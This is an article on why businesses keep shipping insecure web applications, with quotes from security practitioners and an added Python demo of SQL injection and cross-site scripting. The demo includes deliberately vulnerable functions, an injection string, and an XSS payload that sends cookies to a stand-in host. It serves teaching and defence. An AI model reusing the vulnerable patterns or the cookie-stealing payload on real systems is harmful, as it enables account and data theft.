Summary: As cyber attacks increase and become more sophisticated, businesses should be doubling down on their application security. Yet application security still lags behind. Businesses are not only still developing insecure applications, they are building applications with widely known vulnerabilities. Why is security still such a big problem, and how can you address it?
Let me ask you a question: Which aspect of your business systems do you think hackers target the most? As mentioned in this article: “According to numerous studies, the preferred method for attacking businesses’ online assets is via their Web applications.”
Why do hackers target web apps? Because they are commonly built with known vulnerabilities, giving attackers an easy way into a business.
A recent report found that 86 percent of web applications tested had serious issues with authentication, access control, and confidentiality. Worse, 52 percent of web applications suffered from commonly known vulnerabilities like Cross-Site Scripting, SQL Injection, and others.
These findings are downright scary. Businesses aren't even protecting their applications against the most common threats. For a decade now, threats like Cross-Site Scripting and SQL Injection have taken the top spots in the OWASP Top Ten list, a listing of the most critical web app security flaws. What's more, they are not that hard to fix: parameterized queries and context-aware output encoding, respectively, address the overwhelming majority of both.
Consider those facts together: Most business web applications suffer from widely known yet preventable security vulnerabilities. These are not new threats; they have been listed among the top security risks for over 10 years running. And they can cause irreparable damage to a business.
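To make the "not that hard to fix" point concrete, here is an added example (not code from the original article or from any of the people quoted in it) showing each of the two flaws named above as a vulnerable function beside its fix. It uses only the Python standard library; the in-memory users table and the two attacker inputs are constructed for the demonstration, and the table and column names are assumptions.

```python
"""Added example: SQL Injection and Cross-Site Scripting, vulnerable form beside the fix.
Everything here (the users table, the payloads) is constructed for the demonstration."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory users table with three accounts (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (username, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """SQL Injection: the input is concatenated into the statement text, so a quote
    in the input changes the query's structure instead of staying data."""
    query = "SELECT id, username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """The fix: a parameterized query. The value travels separately from the statement,
    so quotes in it are never parsed as SQL."""
    query = "SELECT id, username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def apostrophe_breaks_vulnerable(conn: sqlite3.Connection) -> bool:
    """Side effect of the same bug: a legitimate name such as O'Brien makes the
    concatenated query a syntax error. Returns True if the database rejects it."""
    try:
        find_user_vulnerable(conn, "O'Brien")
    except sqlite3.Error:
        return True
    return False


def greeting_vulnerable(display_name: str) -> str:
    """Cross-Site Scripting: untrusted text is written straight into HTML markup."""
    return "<p>Welcome back, " + display_name + "!</p>"


def greeting_safe(display_name: str) -> str:
    """The fix: encode for the output context (here the HTML body) before emitting it.
    quote=True also encodes ' and ", which matters if the same value lands in an attribute."""
    return "<p>Welcome back, " + html.escape(display_name, quote=True) + "!</p>"


# Constructed attacker inputs.
SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def demo() -> dict:
    """Run both payloads through the vulnerable and the fixed functions."""
    conn = make_db()
    return {
        "sqli_vulnerable_rows": len(find_user_vulnerable(conn, SQLI_PAYLOAD)),  # 3: every row leaks
        "sqli_safe_rows": len(find_user_safe(conn, SQLI_PAYLOAD)),  # 0: no such username
        "xss_vulnerable_has_script": "<script>" in greeting_vulnerable(XSS_PAYLOAD),  # True
        "xss_safe_has_script": "<script>" in greeting_safe(XSS_PAYLOAD),  # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The one caveat a practitioner should keep in mind: `html.escape` is correct for text placed in the HTML body or a quoted attribute, but a value inserted into a JavaScript string, a URL, or a CSS rule needs the encoder for that context; "escape once, everywhere" is how output encoding is done wrong.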
Why does this keep happening year after year? Why do businesses keep creating applications containing known (and dangerous) vulnerabilities? How can your business address these issues? Today, let's explore those questions. Here are a few common reasons why businesses still create insecure applications:
1. Web application security is nobody’s job
Businesses often approach development with a false assumption: good developers understand security and build it into their applications. To a certain extent, that's true. Developers should understand the basics of building a secure application.
But you can't expect a developer to be a security expert. It's an unfair assumption, considering that their job description centers on development. They get hired to build applications. Can they possibly compete with attackers who spend all of their time trying to break web applications? Of course not. They may understand the basics, but they don't have the time to keep up with every aspect of security.
“Application developers are rarely (never?) hired because of their security expertise,” says Julien Bellanger, CEO of Prevoty. “They are hired to deliver new applications and new functionality. In order to attempt to stay ahead of hackers, security professionals need to spend a lot of their working lives monitoring the ‘state of the art’ in terms of publicly available knowledge around vulnerabilities. It takes a thief to catch a thief. Developers were not hired to do this, they don’t have the time to do this and their skill sets are not best placed to implement mitigations against complex attacks.”
2. Management places little focus on security
Peter Drucker is famously quoted as saying, “What is measured improves.” The problem for many developers: Security isn’t measured. They don’t get measured or rewarded for creating secure applications.
It’s a great question to ask yourself: What are we measuring? What is our reward structure? If you judge and reward your developers on how quickly they work, but not on security…what do you think will happen? Developers will recognize that management places little emphasis on security, and will follow the lead.
“Security takes time and money and in most organisations it’s at the bottom of the priority list,” says Andreas Heiberg, Senior Developer at UpDownLeftRight. “When deadlines are slipping and money is tight it’s easy to skip vigorously testing and over architecting your system.”
3. Security takes a backseat to development speed
“In my experience, working with large and small development organisations, the main reason behind this is the rush to be first to market,” says Taz Wake CPP CISSP CISM CEH CRISC CCISO CCSK, Security Director at Halkyn Consulting Ltd. “The business driver is for applications to be developed quickly, before a competitor can produce one, and then deployed to the user community. This speed to market, combined with downward pressure on costs, often leads to developers reusing the same code blocks so mistakes keep turning up. On one client engagement we discovered that the developers were simply searching GitHub and Google Code for everything and using it without making any changes – even when the code had been posted to ask for help fixing a problem.”
This problem stems from the issue mentioned above. What are you measuring? Businesses frequently place greater importance on other areas of development (like speed), forcing security to take a backseat. How common is this problem? In the survey quoted below, more than 70 percent of the developers asked said that business pressure to release updates often overrides security concerns.
“Agile development methodologies have become almost standard for enterprise application development and business requirements are driving more rapid application releases,” says Bellanger. “This means that the time required to fix all identified vulnerabilities is often short and sometimes non-existent. We surveyed over 200 application developers on this very topic and found that more than 70 percent admitted that business pressures to release application updates often overrode security concerns.”
4. The business doesn’t invest in proper training
The security landscape constantly evolves. Developers need regular training just to keep up with best practices. Without it, they can't possibly stay on top of security changes while also handling their development responsibilities.
The problem: if business leaders don't grasp the importance of security, they won't devote resources to proper training. Without a mandate for training that comes from leadership, developers will focus their efforts on meeting their daily demands, while falling further and further out of touch with security.
“There are many security problems that continue to permeate the application development arena,” says Max Aulakh, Chief Security Architect at MAFAZO: Digital Solutions. “The primary being lack of training that targets developer behavior change. We are teaching about how to do bug changes, create threat models and yet fail to address impact to the business that developers get and understand so it’s in their best interest to build a secure application. This has to come from leadership down in the form of training and it’s NOT best done via power point slides. This is fundamental to building secure applications more so than any process or software you could purchase.”
5. Application development gets treated as a one-time project
The security landscape is constantly evolving. New threats emerge on a daily basis. Software vendors regularly release patches to cover new security flaws.
The problem is, development is often looked at as a one-time project. Once the application is completed and delivered, it’s on to the next one. But, who is in charge of keeping existing applications secure? Who is in charge of keeping frameworks and libraries used in an application up to date? If you don’t know, the answer is probably “no one.”
“A business building its own apps usually treats it as a one-time endeavor,” says Tsahi Levent-Levi, Consultant and Analyst, Founder of BlogGeek.me. “Once the app is complete and launched, little is done to improve and maintain it beyond the basics. Security threats are an ongoing issue – one you need to deal with continuously, so unless the app in question is core to the business itself (i.e., makes direct money as opposed to being supportive to the business itself), little will be done to actively find and fix these security issues.”
Now, I realize this list of challenges might seem daunting to those taking a hard look at their application security for the first time. But don't let it scare you. Hopefully this article helps prepare you for the journey, and gives you a good idea of what to expect. If you would like to add anything to this list, I'd love to hear it. Feel free to share in the comments.